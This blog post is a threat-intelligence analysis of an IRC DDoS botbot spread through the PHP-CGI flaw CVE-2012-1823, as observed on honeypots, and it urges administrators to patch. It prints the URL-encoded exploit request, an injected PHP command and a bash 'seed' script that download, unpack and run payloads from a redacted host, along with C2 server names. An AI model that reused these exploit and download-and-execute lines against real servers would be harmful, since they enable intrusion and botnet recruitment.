Tuesday, July 8, 2014

Another Linux DDoS bot via CVE-2012-1823

If you run a web server, you should be very familiar with the PHP vulnerability classified as CVE-2012-1823.  Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via command line options within the HTTP query string.  Unfortunately, there remain a large number of PHP servers that do not have this vulnerability patched, making them an ideal vehicle for acting as a DDoS bot.  

Our friends at MalwareMustDie have recently put up several excellent posts discussing Linux malware, particularly dealing with DDoS.  While they have covered a wide spectrum of Linux malware in the wild, it seems that new variants and bot infrastructures are continually being spun up.  We like to study and track these variants and infrastructures, as well as the payloads that are being injected.  In this case, one particular payload caught our eye.

In this case, the exploit attempt had URL encoding of:

POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Host: -h

When decoded, the actual URL is :

Decoded CVE-2012-1823 exploit attempt

Upon successful compromise, the attacker injects the following:

<? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?>

seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed"

#!/bin/bash
cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun

This script instructs the compromised server to fetch 'index.htm' from http://<redacted>.us.to. This again is a tar file, which when expanded, gives a file named "libssl3.so.2".  This file is actually a perl script called "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team".  A copy of this popular IRCBot can be found at this PasteBin link.

Some of the configuration variables for the version of IrcBot dropped on our honeypots include:
$server = 'antiq.scifi.ro'
$server = 'antiq.evils.in'
my @admins = ("AnTiQ","deathy","Vasy");
my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");
my @channels = ("#vnc");

The "seed' script also instructed our server to download "stats.php".  This was also a tar file, which when expanded, created a hidden directory named ".d" which contained the following files:

Contents of hidden 'd' subdirectory
The subdirectory "c" contained source files for port flooding routines.

Contents of 'c' subdirectory


Section of "Slashing SirVic's"flooding source code.

Two other files included in the "stats.php" tarball were of particular interest.  They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports.  At this point, it's not clear what these lists represent, however "bang.txt" appears to contain many non-U.S addresses, notably weighted toward Romania.  "shiet.txt" contains a wide variety of IP addresses, representing many kinds of organizations, corporations, universities, and service providers.
After observing several DDoS attacks initiated by this infrastructure, we didn't note a correlation between these lists, and any attack victims.  We also did not yet observe any correlation between these lists and compromised hosts initiating DDoS attack traffic.

The contents of "bang.txt", broken out by ASN and Network name can be viewed from here: Link to "bang.txt"

The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here:  Link to "shiet.txt"

Soon after the script downloads, our server joined the IRC on antiq.scifi.ro (195.182.159.51)

Bot joining C2 on antiq.scifi.ro
Not long after that, a command initiating a flood attack against 70.39.96.225 begins, and the compromised host begins sending fragmented UDP packets to the victim.


Bot being instructed to begin UDP flood to victim

Packet capture of UDP flood
We've observed this botnet as being very active, targeting a wide variety of victims.   While IRC botnets have been around for many years, the seeding and attack mechanisms continue to evolve.

Unpatched CMS, weak SSH passwords, as well as vulnerable PHP deployments remain a major weakspot in Internet facing servers.  It's pretty safe to say that if web site administrators do not perform a regular, stringent patch management program, it's just a matter of 'when', not 'if' they will be compromised.